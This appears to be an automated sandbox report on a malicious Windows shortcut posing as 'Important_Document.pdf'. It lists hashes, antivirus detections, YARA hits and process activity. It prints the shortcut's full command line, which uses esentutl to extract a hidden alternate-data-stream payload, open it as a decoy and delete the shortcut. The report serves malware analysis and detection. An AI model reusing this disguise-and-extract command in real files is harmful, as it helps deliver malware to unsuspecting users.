Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 29, 2025, 4:21 p.m.	April 29, 2025, 4:23 p.m.

Size	2.4KB
Type	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=2, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`385fc26e157df48cc8d4ae10161b325c`
SHA256	`976bf4005960a2635ec60b3257a0fce340e5fff8f399a6dd4979f44c7af9bfdf`
CRC32	`13DB6AE1`
ssdeep	`24:8IJtnyURef2F9QKVPGbNU0kKsYovo+/QT4I02lXQ6ciXeyqj4mbwYRl925hefx9:8QITogfMIbXCiX4kPVh`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "PBAB" C:\Users\test22\AppData\Local\Temp\Important_Document.pdf.lnk
2544
- cmd.exe "C:\WINDOWS\system32\cmd.exe" /c esentutl.exe /y "%cd%\Important_Document.pdf.lnk:PDF.pdf" /d "%cd%\Important_Document.pdf" /o & IF EXIST "%cd%\Important_Document.pdf" (start "" "%cd%\Important_Document.pdf" & del "%cd%\Important_Document.pdf.lnk") ELSE msg * "Cannot open file, please extract manually."
  2660
  - esentutl.exe esentutl.exe /y "C:\Windows\system32\Important_Document.pdf.lnk:PDF.pdf" /d "C:\Windows\system32\Important_Document.pdf" /o
    2756

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (7 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 29, 2025, 4:21 p.m.	buffer: 'msg' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA April 29, 2025, 4:21 p.m.	buffer: Initiating COPY FILE mode... console_handle: 0x00000007	1	1
WriteConsoleA April 29, 2025, 4:21 p.m.	buffer: Source File: C:\Windows\system32\Important_Document.pdf.lnk:PDF.pdf console_handle: 0x00000007	1	1
WriteConsoleA April 29, 2025, 4:21 p.m.	buffer: Destination File: C:\Windows\system32\Important_Document.pdf console_handle: 0x00000007	1	1
WriteConsoleA April 29, 2025, 4:21 p.m.	buffer: Copy Progress (% complete) console_handle: 0x00000007	1	1
WriteConsoleA April 29, 2025, 4:21 p.m.	buffer: FAILURE: CreateFile: . console_handle: 0x0000000b	1	1
WriteConsoleA April 29, 2025, 4:21 p.m.	buffer: Operation terminated unsuccessfully after 0.16 seconds. console_handle: 0x00000007	1	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Important_Document.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\WINDOWS\system32\cmd.exe" /c esentutl.exe /y "%cd%\Important_Document.pdf.lnk:PDF.pdf" /d "%cd%\Important_Document.pdf" /o & IF EXIST "%cd%\Important_Document.pdf" (start "" "%cd%\Important_Document.pdf" & del "%cd%\Important_Document.pdf.lnk") ELSE msg * "Cannot open file, please extract manually."

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

Creates an Alternate Data Stream (ADS) (1 event)

file	C:\Windows\System32\Important_Document.pdf.lnk:PDF.pdf

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

CTX	lnk.trojan.generic
Skyhigh	BehavesLike.Trojan.xx
VIPRE	Heur.BZC.YAX.Pantera.69.4FB34A79
Arcabit	Heur.BZC.YAX.Pantera.69.4FB34A79
TrendMicro-HouseCall	HEUR_LNKEXEC.C
BitDefender	Heur.BZC.YAX.Pantera.69.4FB34A79
MicroWorld-eScan	Heur.BZC.YAX.Pantera.69.4FB34A79
Emsisoft	Heur.BZC.YAX.Pantera.69.4FB34A79 (B)
TrendMicro	HEUR_LNKEXEC.C
Google	Detected
Microsoft	Trojan:Script/Wacatac.B!ml
GData	Heur.BZC.YAX.Pantera.69.4FB34A79
Varist	LNK/ABTrojan.BPDU-
VBA32	Trojan.Link.DoubleRun
Ikarus	Win32.Outbreak
Zoner	Probably Heur.LNKScript

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2544 resumed a thread in remote process 2660
NtResumeThread April 29, 2025, 4:21 p.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 2660	1	0	0

Important_Document.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All